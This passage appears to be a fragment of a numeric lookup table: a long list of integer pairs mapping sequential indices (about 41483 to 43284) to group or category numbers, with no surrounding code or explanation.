(41483, 1377),
(41484, 1377),
(41485, 1377),
(41486, 1377),
(41487, 1377),
(41488, 1409),
(41489, 1409),
(41490, 1409),
(41491, 1409),
(41492, 1409),
(41493, 1409),
(41494, 1409),
(41495, 1428),
(41496, 1491),
(41497, 4),
(41498, 4),
(41499, 4),
(41500, 4),
(41501, 4),
(41502, 4),
(41503, 4),
(41504, 4),
(41505, 4),
(41506, 4),
(41507, 4),
(41508, 2054),
(41509, 2054),
(41510, 2054),
(41511, 2054),
(41512, 2054),
(41513, 2054),
(41514, 2054),
(41515, 2054),
(41516, 2054),
(41517, 2054),
(41518, 2054),
(41519, 2054),
(41520, 2054),
(41521, 2054),
(41522, 2054),
(41523, 2054),
(41524, 2054),
(41525, 2054),
(41526, 2054),
(41527, 2054),
(41528, 2054),
(41529, 2054),
(41530, 2054),
(41531, 2054),
(41532, 2054),
(41533, 2054),
(41534, 2055),
(41535, 2055),
(41536, 2055),
(41537, 2055),
(41538, 2055),
(41539, 2055),
(41540, 2055),
(41541, 2055),
(41542, 2055),
(41543, 2055),
(41544, 2055),
(41545, 2055),
(41546, 2055),
(41547, 2055),
(41548, 2055),
(41549, 2055),
(41550, 2055),
(41551, 2055),
(41552, 2055),
(41553, 2055),
(41554, 2055),
(41555, 2055),
(41556, 2055),
(41557, 2055),
(41558, 2055),
(41559, 2055),
(41560, 2055),
(41561, 2055),
(41562, 2055),
(41563, 2055),
(41564, 2055),
(41565, 17),
(41566, 18),
(41567, 19),
(41568, 20),
(41569, 21),
(41570, 22),
(41571, 23),
(41572, 6),
(41573, 7),
(41574, 8),
(41575, 9),
(41576, 10),
(41577, 11),
(41578, 12),
(41579, 14),
(41580, 15),
(41581, 24),
(41582, 25),
(41583, 26),
(41584, 27),
(41585, 28),
(41586, 29),
(41587, 30),
(41588, 31),
(41589, 40),
(41590, 41),
(41591, 42),
(41592, 43),
(41593, 44),
(41594, 45),
(41595, 46),
(41596, 47),
(41597, 48),
(41598, 33),
(41599, 34),
(41600, 35),
(41601, 36),
(41602, 37),
(41603, 38),
(41604, 39),
(41605, 49),
(41606, 51),
(41607, 52),
(41608, 53),
(41609, 58),
(41610, 59),
(41611, 60),
(41612, 61),
(41613, 64),
(41614, 65),
(41615, 66),
(41616, 67),
(41617, 68),
(41618, 71),
(41619, 72),
(41620, 73),
(41621, 74),
(41622, 75),
(41623, 76),
(41624, 77),
(41625, 13),
(41626, 16),
(41627, 32),
(41628, 50),
(41629, 54),
(41630, 55),
(41631, 56),
(41656, 2057),
(41657, 2057),
(41658, 2057),
(41659, 2057),
(41660, 2057),
(41661, 2057),
(41662, 2057),
(41663, 2057),
(41664, 2057),
(41665, 2057),
(41666, 2057),
(41667, 2057),
(41668, 2057),
(41669, 2057),
(41670, 2057),
(41671, 2057),
(41672, 2057),
(41673, 2057),
(41674, 2057),
(41675, 2057),
(41676, 2057),
(41677, 2058),
(41678, 2058),
(41679, 2058),
(41680, 2058),
(41681, 2058),
(41682, 2058),
(41683, 2058),
(41684, 2058),
(41685, 2058),
(41686, 2058),
(41687, 2058),
(41688, 2058),
(41689, 2058),
(41690, 2058),
(41691, 2058),
(41692, 2058),
(41693, 2058),
(41694, 2058),
(41695, 2058),
(41696, 2058),
(41697, 2058),
(41698, 2058),
(41699, 2058),
(41700, 2058),
(41701, 2058),
(41702, 2058),
(41703, 2058),
(41704, 2058),
(41705, 2058),
(41706, 2058),
(41707, 2058),
(41708, 2058),
(41709, 2058),
(41710, 2058),
(41711, 2058),
(41712, 2058),
(41713, 2058),
(41714, 2059),
(41715, 2059),
(41716, 2059),
(41717, 2059),
(41718, 2059),
(41719, 2059),
(41720, 2059),
(41721, 2059),
(41722, 2059),
(41723, 2059),
(41724, 2059),
(41725, 2059),
(41726, 2059),
(41727, 2059),
(41728, 2059),
(41729, 2059),
(41730, 2059),
(41731, 2059),
(41732, 2059),
(41733, 2059),
(41734, 2059),
(41735, 2059),
(41736, 2059),
(41737, 2059),
(41738, 2059),
(41739, 2059),
(41740, 2059),
(41741, 2059),
(41742, 2059),
(41743, 2059),
(41744, 2059),
(41745, 2059),
(41746, 2059),
(41747, 2060),
(41748, 2060),
(41749, 2060),
(41750, 2060),
(41751, 2060),
(41752, 2060),
(41753, 2060),
(41754, 2060),
(41755, 2060),
(41756, 2060),
(41757, 2060),
(41758, 2060),
(41759, 2060),
(41760, 2060),
(41761, 2060),
(41762, 2060),
(41763, 2060),
(41764, 2060),
(41765, 2060),
(41766, 2060),
(41767, 2060),
(41768, 2060),
(41769, 2060),
(41770, 2060),
(41771, 2060),
(41772, 2060),
(41773, 2060),
(41774, 2060),
(41775, 2060),
(41776, 2060),
(41777, 2060),
(41778, 2060),
(41779, 2060),
(41780, 57),
(41781, 62),
(41782, 63),
(41783, 69),
(41784, 70),
(41785, 78),
(41786, 79),
(41787, 80),
(41788, 81),
(41789, 82),
(41790, 83),
(41791, 84),
(41792, 85),
(41793, 86),
(41794, 87),
(41795, 88),
(41796, 89),
(41797, 90),
(41798, 91),
(41799, 92),
(41800, 93),
(41801, 94),
(41802, 95),
(41803, 96),
(41804, 97),
(41805, 98),
(41806, 99),
(41807, 100),
(41808, 101),
(41809, 102),
(41810, 103),
(41811, 104),
(41812, 105),
(41813, 106),
(41814, 107),
(41815, 108),
(41816, 109),
(41817, 110),
(41818, 111),
(41819, 112),
(41820, 113),
(41821, 114),
(41822, 115),
(41823, 116),
(41824, 117),
(41825, 118),
(41826, 119),
(41827, 120),
(41828, 121),
(41829, 122),
(41830, 123),
(41831, 124),
(41832, 125),
(41833, 126),
(41834, 127),
(41835, 128),
(41836, 129),
(41837, 130),
(41838, 131),
(41839, 132),
(41840, 133),
(41841, 134),
(41842, 135),
(41843, 136),
(41844, 137),
(41845, 138),
(41846, 139),
(41847, 140),
(41848, 141),
(41849, 142),
(41850, 143),
(41851, 144),
(41852, 145),
(41853, 146),
(41854, 147),
(41855, 148),
(41856, 149),
(41857, 150),
(41858, 151),
(41859, 152),
(41860, 153),
(41861, 154),
(41862, 155),
(41863, 156),
(41864, 157),
(41865, 158),
(41866, 159),
(41867, 160),
(41868, 161),
(41869, 162),
(41870, 163),
(41871, 164),
(41872, 165),
(41873, 166),
(41874, 167),
(41875, 168),
(41876, 169),
(41877, 170),
(41878, 171),
(41879, 172),
(41880, 173),
(41881, 174),
(41882, 175),
(41883, 176),
(41884, 177),
(41885, 178),
(41886, 179),
(41887, 180),
(41888, 181),
(41889, 182),
(41890, 183),
(41891, 184),
(41892, 185),
(41893, 186),
(41894, 187),
(41895, 188),
(41896, 189),
(41897, 190),
(41898, 191),
(41899, 192),
(41900, 193),
(41901, 194),
(41902, 195),
(41903, 196),
(41904, 197),
(41905, 198),
(41906, 199),
(41907, 200),
(41908, 201),
(41909, 202),
(41910, 203),
(41911, 204),
(41912, 205),
(41913, 206),
(41914, 207),
(41915, 208),
(41916, 209),
(41917, 210),
(41918, 211),
(41919, 212),
(41920, 213),
(41921, 214),
(41922, 215),
(41923, 216),
(41924, 217),
(41925, 218),
(41926, 219),
(41927, 220),
(41928, 221),
(41929, 222),
(41930, 223),
(41931, 224),
(41932, 225),
(41933, 226),
(41934, 227),
(41935, 228),
(41936, 229),
(41937, 230),
(41938, 231),
(41939, 232),
(41940, 233),
(41941, 234),
(41942, 235),
(41943, 236),
(41944, 237),
(41945, 238),
(41946, 239),
(41947, 240),
(41948, 241),
(41949, 242),
(41950, 243),
(41951, 244),
(41952, 245),
(41953, 246),
(41954, 247),
(41955, 248),
(41956, 249),
(41957, 250),
(41958, 251),
(41959, 252),
(41960, 253),
(41961, 254),
(41962, 255),
(41963, 256),
(41964, 257),
(41965, 258),
(41966, 259),
(41967, 260),
(41968, 261),
(41969, 262),
(41970, 263),
(41971, 264),
(41972, 265),
(41973, 266),
(41974, 267),
(41975, 268),
(41976, 269),
(41977, 270),
(41978, 271),
(41979, 272),
(41980, 273),
(41981, 274),
(41982, 275),
(41983, 276),
(41984, 277),
(41985, 278),
(41986, 279),
(41987, 280),
(41988, 281),
(41989, 282),
(41990, 283),
(41991, 284),
(41992, 285),
(41993, 286),
(41994, 287),
(41995, 288),
(41996, 289),
(41997, 290),
(41998, 291),
(41999, 292),
(42000, 293),
(42001, 294),
(42002, 295),
(42003, 296),
(42004, 297),
(42005, 298),
(42006, 299),
(42007, 300),
(42008, 301),
(42009, 302),
(42010, 303),
(42011, 304),
(42012, 305),
(42013, 306),
(42014, 307),
(42015, 308),
(42016, 309),
(42017, 310),
(42018, 311),
(42019, 312),
(42020, 313),
(42021, 314),
(42022, 315),
(42023, 316),
(42024, 317),
(42025, 318),
(42026, 319),
(42027, 320),
(42028, 321),
(42029, 322),
(42030, 323),
(42031, 324),
(42032, 325),
(42033, 326),
(42034, 327),
(42035, 328),
(42036, 329),
(42037, 330),
(42038, 331),
(42039, 332),
(42040, 333),
(42041, 334),
(42042, 335),
(42043, 336),
(42044, 337),
(42045, 338),
(42046, 339),
(42047, 340),
(42048, 341),
(42049, 342),
(42050, 343),
(42051, 344),
(42052, 345),
(42053, 346),
(42054, 347),
(42055, 348),
(42056, 349),
(42057, 350),
(42058, 351),
(42059, 352),
(42060, 353),
(42061, 354),
(42062, 355),
(42063, 356),
(42064, 357),
(42065, 358),
(42066, 359),
(42067, 360),
(42068, 361),
(42069, 362),
(42070, 363),
(42071, 364),
(42072, 365),
(42073, 366),
(42074, 367),
(42075, 368),
(42076, 369),
(42077, 370),
(42078, 371),
(42079, 372),
(42080, 373),
(42081, 374),
(42082, 375),
(42083, 376),
(42084, 377),
(42085, 378),
(42086, 379),
(42087, 380),
(42088, 381),
(42089, 382),
(42090, 383),
(42091, 384),
(42092, 385),
(42093, 386),
(42094, 387),
(42095, 388),
(42096, 389),
(42097, 390),
(42098, 391),
(42099, 392),
(42100, 393),
(42101, 394),
(42102, 395),
(42103, 396),
(42104, 397),
(42105, 398),
(42106, 399),
(42107, 400),
(42108, 401),
(42109, 402),
(42110, 403),
(42111, 404),
(42112, 405),
(42113, 406),
(42114, 407),
(42115, 408),
(42116, 409),
(42117, 410),
(42118, 411),
(42119, 412),
(42120, 413),
(42121, 414),
(42122, 415),
(42123, 416),
(42124, 417),
(42125, 418),
(42126, 419),
(42127, 420),
(42128, 421),
(42129, 422),
(42130, 423),
(42131, 424),
(42132, 425),
(42133, 426),
(42134, 427),
(42135, 428),
(42136, 429),
(42137, 430),
(42138, 431),
(42139, 432),
(42140, 433),
(42141, 434),
(42142, 435),
(42143, 436),
(42144, 437),
(42145, 438),
(42146, 439),
(42147, 440),
(42148, 441),
(42149, 442),
(42150, 443),
(42151, 444),
(42152, 445),
(42153, 446),
(42154, 447),
(42155, 448),
(42156, 449),
(42157, 450),
(42158, 451),
(42159, 452),
(42160, 453),
(42161, 454),
(42162, 455),
(42163, 456),
(42164, 457),
(42165, 458),
(42166, 459),
(42167, 460),
(42168, 2061),
(42169, 2061),
(42170, 2061),
(42171, 2061),
(42172, 2061),
(42173, 2061),
(42174, 2061),
(42175, 2061),
(42176, 2061),
(42177, 2061),
(42178, 2061),
(42179, 2061),
(42180, 2061),
(42181, 2061),
(42182, 2061),
(42183, 2061),
(42184, 2061),
(42185, 2061),
(42186, 2061),
(42187, 2061),
(42188, 2061),
(42189, 2061),
(42190, 2061),
(42191, 2061),
(42192, 2061),
(42193, 2061),
(42194, 2061),
(42195, 461),
(42196, 462),
(42197, 463),
(42198, 464),
(42199, 465),
(42200, 466),
(42201, 467),
(42202, 468),
(42203, 469),
(42204, 470),
(42205, 471),
(42206, 472),
(42207, 473),
(42208, 474),
(42209, 475),
(42210, 476),
(42211, 477),
(42212, 478),
(42213, 479),
(42214, 480),
(42215, 481),
(42216, 482),
(42217, 483),
(42218, 484),
(42219, 485),
(42220, 486),
(42221, 487),
(42222, 488),
(42223, 489),
(42224, 490),
(42225, 491),
(42226, 492),
(42227, 493),
(42228, 494),
(42229, 495),
(42230, 496),
(42231, 497),
(42232, 498),
(42233, 499),
(42234, 500),
(42235, 501),
(42236, 502),
(42237, 503),
(42238, 504),
(42239, 505),
(42240, 506),
(42241, 507),
(42242, 508),
(42243, 509),
(42244, 510),
(42245, 511),
(42246, 512),
(42247, 513),
(42248, 514),
(42249, 515),
(42250, 516),
(42251, 517),
(42252, 518),
(42253, 519),
(42254, 520),
(42255, 521),
(42256, 522),
(42257, 523),
(42258, 524),
(42259, 525),
(42260, 526),
(42261, 527),
(42262, 528),
(42263, 529),
(42264, 530),
(42265, 531),
(42266, 532),
(42267, 533),
(42268, 534),
(42269, 535),
(42270, 536),
(42271, 537),
(42272, 538),
(42273, 539),
(42274, 540),
(42275, 541),
(42276, 542),
(42277, 543),
(42278, 544),
(42279, 545),
(42280, 546),
(42281, 547),
(42282, 548),
(42283, 549),
(42284, 550),
(42285, 551),
(42286, 552),
(42287, 553),
(42288, 554),
(42289, 555),
(42290, 556),
(42291, 557),
(42292, 558),
(42293, 559),
(42294, 560),
(42295, 561),
(42296, 562),
(42297, 563),
(42298, 564),
(42299, 565),
(42300, 566),
(42301, 567),
(42302, 568),
(42303, 569),
(42304, 570),
(42305, 571),
(42306, 572),
(42307, 573),
(42308, 574),
(42309, 575),
(42310, 576),
(42311, 577),
(42312, 578),
(42313, 579),
(42314, 580),
(42315, 581),
(42316, 582),
(42317, 583),
(42318, 584),
(42319, 585),
(42320, 586),
(42321, 587),
(42322, 588),
(42323, 589),
(42324, 590),
(42325, 591),
(42326, 592),
(42327, 593),
(42328, 594),
(42329, 595),
(42330, 596),
(42331, 597),
(42332, 598),
(42333, 599),
(42334, 600),
(42335, 601),
(42336, 2061),
(42337, 2061),
(42338, 2061),
(42339, 2061),
(42340, 602),
(42341, 603),
(42342, 604),
(42343, 605),
(42344, 2061),
(42345, 2061),
(42346, 606),
(42347, 607),
(42348, 608),
(42349, 609),
(42350, 610),
(42351, 611),
(42352, 612),
(42353, 613),
(42354, 614),
(42355, 615),
(42356, 616),
(42357, 617),
(42358, 618),
(42359, 619),
(42360, 620),
(42361, 621),
(42362, 622),
(42363, 623),
(42364, 624),
(42365, 625),
(42366, 626),
(42367, 627),
(42368, 628),
(42369, 629),
(42370, 630),
(42371, 631),
(42372, 632),
(42373, 633),
(42374, 634),
(42375, 635),
(42376, 636),
(42377, 637),
(42378, 638),
(42379, 639),
(42380, 640),
(42381, 641),
(42382, 642),
(42383, 643),
(42384, 644),
(42385, 645),
(42386, 646),
(42387, 647),
(42388, 648),
(42389, 649),
(42390, 650),
(42391, 651),
(42392, 652),
(42393, 653),
(42394, 654),
(42395, 655),
(42396, 656),
(42397, 657),
(42398, 658),
(42399, 659),
(42400, 660),
(42401, 661),
(42402, 662),
(42403, 663),
(42404, 664),
(42405, 665),
(42406, 666),
(42407, 667),
(42408, 668),
(42409, 669),
(42410, 670),
(42411, 671),
(42412, 672),
(42413, 673),
(42414, 674),
(42415, 675),
(42416, 676),
(42417, 677),
(42418, 678),
(42419, 679),
(42420, 680),
(42421, 681),
(42422, 682),
(42423, 683),
(42424, 684),
(42425, 685),
(42426, 686),
(42427, 687),
(42428, 688),
(42429, 689),
(42430, 690),
(42431, 691),
(42432, 692),
(42433, 693),
(42434, 694),
(42435, 695),
(42436, 696),
(42437, 697),
(42438, 698),
(42439, 699),
(42440, 700),
(42441, 701),
(42442, 702),
(42443, 703),
(42444, 704),
(42445, 705),
(42446, 706),
(42447, 707),
(42448, 708),
(42449, 709),
(42450, 710),
(42451, 711),
(42452, 712),
(42453, 713),
(42454, 714),
(42455, 715),
(42456, 716),
(42457, 717),
(42458, 718),
(42459, 719),
(42460, 720),
(42461, 721),
(42462, 722),
(42463, 723),
(42464, 724),
(42465, 725),
(42466, 726),
(42467, 727),
(42468, 728),
(42469, 729),
(42470, 730),
(42471, 731),
(42472, 732),
(42473, 733),
(42474, 734),
(42475, 735),
(42476, 736),
(42477, 737),
(42478, 738),
(42479, 739),
(42480, 740),
(42481, 741),
(42482, 742),
(42483, 743),
(42484, 744),
(42485, 745),
(42486, 746),
(42487, 747),
(42488, 748),
(42489, 749),
(42490, 750),
(42491, 751),
(42492, 752),
(42493, 753),
(42494, 754),
(42495, 755),
(42496, 756),
(42497, 757),
(42498, 758),
(42499, 759),
(42500, 760),
(42501, 761),
(42502, 762),
(42503, 763),
(42504, 764),
(42505, 765),
(42506, 766),
(42507, 767),
(42508, 768),
(42509, 769),
(42510, 770),
(42511, 771),
(42512, 772),
(42513, 773),
(42514, 774),
(42515, 775),
(42516, 776),
(42517, 777),
(42518, 778),
(42519, 779),
(42520, 780),
(42521, 781),
(42522, 782),
(42523, 783),
(42524, 784),
(42525, 785),
(42526, 786),
(42527, 787),
(42528, 2062),
(42529, 2062),
(42530, 2062),
(42531, 2062),
(42532, 2062),
(42533, 2062),
(42534, 2062),
(42535, 2062),
(42536, 2062),
(42537, 2062),
(42538, 2062),
(42539, 2062),
(42540, 2062),
(42541, 2062),
(42542, 2062),
(42543, 2062),
(42544, 2062),
(42545, 2062),
(42546, 2062),
(42547, 2062),
(42548, 2062),
(42549, 2062),
(42550, 2062),
(42551, 2062),
(42552, 2062),
(42553, 2062),
(42554, 2062),
(42555, 2062),
(42556, 2062),
(42557, 2062),
(42558, 788),
(42559, 789),
(42560, 790),
(42561, 791),
(42562, 792),
(42563, 793),
(42564, 794),
(42565, 795),
(42566, 796),
(42567, 797),
(42568, 2062),
(42569, 2062),
(42570, 2062),
(42571, 2062),
(42572, 2062),
(42573, 2062),
(42574, 2062),
(42575, 2062),
(42576, 2062),
(42577, 2062),
(42578, 2062),
(42579, 798),
(42580, 799),
(42581, 800),
(42582, 801),
(42583, 2062),
(42584, 2062),
(42585, 2062),
(42586, 802),
(42587, 803),
(42588, 804),
(42589, 805),
(42590, 806),
(42591, 807),
(42592, 808),
(42593, 809),
(42594, 810),
(42595, 2062),
(42596, 2062),
(42597, 2062),
(42598, 2062),
(42599, 2062),
(42600, 2062),
(42601, 811),
(42602, 812),
(42603, 813),
(42604, 814),
(42605, 815),
(42606, 816),
(42607, 817),
(42608, 818),
(42609, 819),
(42610, 820),
(42611, 821),
(42612, 822),
(42613, 823),
(42614, 824),
(42615, 825),
(42616, 826),
(42617, 827),
(42618, 828),
(42619, 829),
(42620, 830),
(42621, 831),
(42622, 832),
(42623, 833),
(42624, 2063),
(42625, 2063),
(42626, 2063),
(42627, 2063),
(42628, 2063),
(42629, 2063),
(42630, 2063),
(42631, 2063),
(42632, 2063),
(42633, 2063),
(42634, 2063),
(42635, 2063),
(42636, 2063),
(42637, 2063),
(42638, 2063),
(42639, 2063),
(42640, 2063),
(42641, 2063),
(42642, 2063),
(42643, 2063),
(42644, 2063),
(42645, 2063),
(42646, 2063),
(42647, 2063),
(42648, 2063),
(42649, 2063),
(42650, 2063),
(42651, 2063),
(42652, 834),
(42653, 835),
(42654, 836),
(42655, 837),
(42656, 838),
(42657, 839),
(42658, 840),
(42659, 841),
(42660, 842),
(42661, 843),
(42662, 2063),
(42663, 2063),
(42664, 2063),
(42665, 2063),
(42666, 2063),
(42667, 2063),
(42668, 2063),
(42669, 2063),
(42670, 2063),
(42671, 844),
(42672, 845),
(42673, 846),
(42674, 847),
(42675, 848),
(42676, 849),
(42677, 2063),
(42678, 2063),
(42679, 2063),
(42680, 2063),
(42681, 2063),
(42682, 2063),
(42683, 2063),
(42684, 2063),
(42685, 2063),
(42686, 850),
(42687, 851),
(42688, 852),
(42689, 853),
(42690, 854),
(42691, 855),
(42692, 856),
(42693, 857),
(42694, 858),
(42695, 859),
(42696, 860),
(42697, 861),
(42698, 862),
(42699, 863),
(42700, 864),
(42701, 865),
(42702, 866),
(42703, 867),
(42704, 868),
(42705, 869),
(42706, 870),
(42707, 871),
(42708, 872),
(42709, 873),
(42710, 874),
(42711, 875),
(42712, 876),
(42713, 877),
(42714, 878),
(42715, 879),
(42716, 880),
(42717, 881),
(42718, 882),
(42719, 883),
(42720, 884),
(42721, 885),
(42722, 886),
(42723, 887),
(42724, 888),
(42725, 889),
(42726, 890),
(42727, 891),
(42728, 892),
(42729, 893),
(42730, 894),
(42731, 895),
(42732, 896),
(42733, 897),
(42734, 898),
(42735, 899),
(42736, 900),
(42737, 901),
(42738, 902),
(42739, 903),
(42740, 904),
(42741, 905),
(42742, 906),
(42743, 907),
(42744, 908),
(42745, 909),
(42746, 910),
(42747, 911),
(42748, 912),
(42749, 913),
(42750, 914),
(42751, 915),
(42752, 916),
(42753, 917),
(42754, 918),
(42755, 919),
(42756, 920),
(42757, 921),
(42758, 922),
(42759, 923),
(42760, 924),
(42761, 925),
(42762, 926),
(42763, 927),
(42764, 928),
(42765, 929),
(42766, 930),
(42767, 931),
(42768, 932),
(42769, 933),
(42770, 934),
(42771, 935),
(42772, 936),
(42773, 937),
(42774, 938),
(42775, 939),
(42776, 940),
(42777, 941),
(42778, 942),
(42779, 943),
(42780, 944),
(42781, 945),
(42782, 946),
(42783, 947),
(42784, 948),
(42785, 949),
(42786, 950),
(42787, 951),
(42788, 952),
(42789, 953),
(42790, 954),
(42791, 955),
(42792, 956),
(42793, 957),
(42794, 958),
(42795, 959),
(42796, 960),
(42797, 961),
(42798, 962),
(42799, 963),
(42800, 964),
(42801, 965),
(42802, 966),
(42803, 967),
(42804, 968),
(42805, 969),
(42806, 970),
(42807, 971),
(42808, 972),
(42809, 973),
(42810, 974),
(42811, 975),
(42812, 976),
(42813, 977),
(42814, 978),
(42815, 979),
(42816, 980),
(42817, 981),
(42818, 982),
(42819, 983),
(42820, 984),
(42821, 985),
(42822, 986),
(42823, 987),
(42824, 988),
(42825, 989),
(42826, 990),
(42827, 991),
(42828, 992),
(42829, 993),
(42830, 994),
(42831, 995),
(42832, 996),
(42833, 997),
(42834, 998),
(42835, 999),
(42836, 1000),
(42837, 1001),
(42838, 1002),
(42839, 1003),
(42840, 1004),
(42841, 1005),
(42842, 1006),
(42843, 1007),
(42844, 1008),
(42845, 1009),
(42846, 1010),
(42847, 1011),
(42848, 1012),
(42849, 1013),
(42850, 1014),
(42851, 1015),
(42852, 1016),
(42853, 1017),
(42854, 1018),
(42855, 1019),
(42856, 1020),
(42857, 1021),
(42858, 1022),
(42859, 1023),
(42860, 1024),
(42861, 1025),
(42862, 1026),
(42863, 1027),
(42864, 1028),
(42865, 1029),
(42866, 1030),
(42867, 1031),
(42868, 1032),
(42869, 1033),
(42870, 1034),
(42871, 1035),
(42872, 1036),
(42873, 1037),
(42874, 1038),
(42875, 1039),
(42876, 1040),
(42877, 1041),
(42878, 1042),
(42879, 1043),
(42880, 1044),
(42881, 1045),
(42882, 1046),
(42883, 1047),
(42884, 1048),
(42885, 1049),
(42886, 1050),
(42887, 1051),
(42888, 1052),
(42889, 1053),
(42890, 1054),
(42891, 1055),
(42892, 1056),
(42893, 1057),
(42894, 1058),
(42895, 1059),
(42896, 1060),
(42897, 1061),
(42898, 1062),
(42899, 1063),
(42900, 1064),
(42901, 1065),
(42902, 1066),
(42903, 1067),
(42904, 1068),
(42905, 1069),
(42906, 1070),
(42907, 1071),
(42908, 1072),
(42909, 1073),
(42910, 1074),
(42911, 1075),
(42912, 1076),
(42913, 1077),
(42914, 1078),
(42915, 1079),
(42916, 1080),
(42917, 1081),
(42918, 1082),
(42919, 1083),
(42920, 1084),
(42921, 1085),
(42922, 1086),
(42923, 1087),
(42924, 1088),
(42925, 1089),
(42926, 1090),
(42927, 1091),
(42928, 1092),
(42929, 1093),
(42930, 1094),
(42931, 1095),
(42932, 1096),
(42933, 1097),
(42934, 1098),
(42935, 1099),
(42936, 1100),
(42937, 1101),
(42938, 1102),
(42939, 1103),
(42940, 1104),
(42941, 1105),
(42942, 1106),
(42943, 1107),
(42944, 1108),
(42945, 1109),
(42946, 1110),
(42947, 1111),
(42948, 1112),
(42949, 1113),
(42950, 1114),
(42951, 1115),
(42952, 1116),
(42953, 1117),
(42954, 1118),
(42955, 1119),
(42956, 1120),
(42957, 1121),
(42958, 1122),
(42959, 1123),
(42960, 1124),
(42961, 1125),
(42962, 1126),
(42963, 1127),
(42964, 1128),
(42965, 1129),
(42966, 1130),
(42967, 1131),
(42968, 1132),
(42969, 1133),
(42970, 1134),
(42971, 1135),
(42972, 1136),
(42973, 1137),
(42974, 1138),
(42975, 1139),
(42976, 1140),
(42977, 1141),
(42978, 1142),
(42979, 1143),
(42980, 1144),
(42981, 1145),
(42982, 1146),
(42983, 1147),
(42984, 1148),
(42985, 1149),
(42986, 1150),
(42987, 1151),
(42988, 1152),
(42989, 1153),
(42990, 1154),
(42991, 1155),
(42992, 1156),
(42993, 1157),
(42994, 1158),
(42995, 1159),
(42996, 1160),
(42997, 1161),
(42998, 1162),
(42999, 1163),
(43000, 1164),
(43001, 1165),
(43002, 1166),
(43003, 1167),
(43004, 1168),
(43005, 1169),
(43006, 1170),
(43007, 1171),
(43008, 1172),
(43009, 1173),
(43010, 1174),
(43011, 1175),
(43012, 1176),
(43013, 1177),
(43014, 1178),
(43015, 1179),
(43016, 1180),
(43017, 1181),
(43018, 1182),
(43019, 1183),
(43020, 1184),
(43021, 1185),
(43022, 1186),
(43023, 1187),
(43024, 1188),
(43025, 1189),
(43026, 1190),
(43027, 1191),
(43028, 1192),
(43029, 1193),
(43030, 1194),
(43031, 1195),
(43032, 1196),
(43033, 1197),
(43034, 1198),
(43035, 1199),
(43036, 1200),
(43037, 1201),
(43038, 1202),
(43039, 1203),
(43040, 1204),
(43041, 1205),
(43042, 1206),
(43043, 1207),
(43044, 1208),
(43045, 1209),
(43046, 1210),
(43047, 1211),
(43048, 1212),
(43049, 1213),
(43050, 1214),
(43051, 1215),
(43052, 1216),
(43053, 1217),
(43054, 1218),
(43055, 1219),
(43056, 1220),
(43057, 1221),
(43058, 1222),
(43059, 1223),
(43060, 1224),
(43061, 1225),
(43062, 1226),
(43063, 1227),
(43064, 1228),
(43065, 1229),
(43066, 1230),
(43067, 1231),
(43068, 1232),
(43069, 1233),
(43070, 1234),
(43071, 1235),
(43072, 1236),
(43073, 1237),
(43074, 1238),
(43075, 1239),
(43076, 1240),
(43077, 1241),
(43078, 1242),
(43079, 1243),
(43080, 1244),
(43081, 1245),
(43082, 1246),
(43083, 1247),
(43084, 1248),
(43085, 1249),
(43086, 1250),
(43087, 1251),
(43088, 1252),
(43089, 1253),
(43090, 1254),
(43091, 1255),
(43092, 1256),
(43093, 1257),
(43094, 1258),
(43095, 1259),
(43096, 1260),
(43097, 1261),
(43098, 1262),
(43099, 1263),
(43100, 1264),
(43101, 1265),
(43102, 1266),
(43103, 1267),
(43104, 1268),
(43105, 1269),
(43106, 1270),
(43107, 1271),
(43108, 1272),
(43109, 1273),
(43110, 1274),
(43111, 1275),
(43112, 1276),
(43113, 1277),
(43114, 1278),
(43115, 1279),
(43116, 1280),
(43117, 1281),
(43118, 1282),
(43119, 1283),
(43120, 1284),
(43121, 1285),
(43122, 1286),
(43123, 1287),
(43124, 1288),
(43125, 1289),
(43126, 1290),
(43127, 1291),
(43128, 1292),
(43129, 1293),
(43130, 1294),
(43131, 1295),
(43132, 1296),
(43133, 1297),
(43134, 1298),
(43135, 1299),
(43136, 1300),
(43137, 1301),
(43138, 1302),
(43139, 1303),
(43140, 1304),
(43141, 1305),
(43142, 1306),
(43143, 1307),
(43144, 1308),
(43145, 1309),
(43146, 1310),
(43147, 1311),
(43148, 1312),
(43149, 1313),
(43150, 1314),
(43151, 1315),
(43152, 1316),
(43153, 1317),
(43154, 1318),
(43155, 1319),
(43156, 1320),
(43157, 1321),
(43158, 1322),
(43159, 1323),
(43160, 1324),
(43161, 1325),
(43162, 1326),
(43163, 1327),
(43164, 1328),
(43165, 1329),
(43166, 1330),
(43167, 1331),
(43168, 1332),
(43169, 1333),
(43170, 1334),
(43171, 1335),
(43172, 1336),
(43173, 1337),
(43174, 1338),
(43175, 1339),
(43176, 1340),
(43177, 1341),
(43178, 1342),
(43179, 1343),
(43180, 1344),
(43181, 1345),
(43182, 1346),
(43183, 1347),
(43184, 1348),
(43185, 1349),
(43186, 1350),
(43187, 1351),
(43188, 1352),
(43189, 1353),
(43190, 1354),
(43191, 1355),
(43192, 1356),
(43193, 1357),
(43194, 1358),
(43195, 1359),
(43196, 1360),
(43197, 1361),
(43198, 1362),
(43199, 1363),
(43200, 1364),
(43201, 1365),
(43202, 1366),
(43203, 1367),
(43204, 1368),
(43205, 1369),
(43206, 1370),
(43207, 1371),
(43208, 1372),
(43209, 1373),
(43210, 1374),
(43211, 1375),
(43212, 1376),
(43213, 1377),
(43214, 1378),
(43215, 1379),
(43216, 1380),
(43217, 1381),
(43218, 1382),
(43219, 1383),
(43220, 1384),
(43221, 1385),
(43222, 1386),
(43223, 1387),
(43224, 1388),
(43225, 1389),
(43226, 1390),
(43227, 1391),
(43228, 1392),
(43229, 1393),
(43230, 1394),
(43231, 1395),
(43232, 1396),
(43233, 1397),
(43234, 1398),
(43235, 1399),
(43236, 1400),
(43237, 1401),
(43238, 1402),
(43239, 1403),
(43240, 1404),
(43241, 1405),
(43242, 1406),
(43243, 1407),
(43244, 1408),
(43245, 1409),
(43246, 1410),
(43247, 1411),
(43248, 1412),
(43249, 1413),
(43250, 1414),
(43251, 1415),
(43252, 1416),
(43253, 1417),
(43254, 1418),
(43255, 1419),
(43256, 1420),
(43257, 1421),
(43258, 1422),
(43259, 1423),
(43260, 1424),
(43261, 1425),
(43262, 1426),
(43263, 1427),
(43264, 1428),
(43265, 1429),
(43266, 1430),
(43267, 1431),
(43268, 1432),
(43269, 1433),
(43270, 1434),
(43271, 1435),
(43272, 1436),
(43273, 1437),
(43274, 1438),
(43275, 1439),
(43276, 1440),
(43277, 1441),
(43278, 1442),
(43279, 1443),
(43280, 1444),
(43281, 1445),
(43282, 1446),
(43283, 1447),
(43284, 1448),
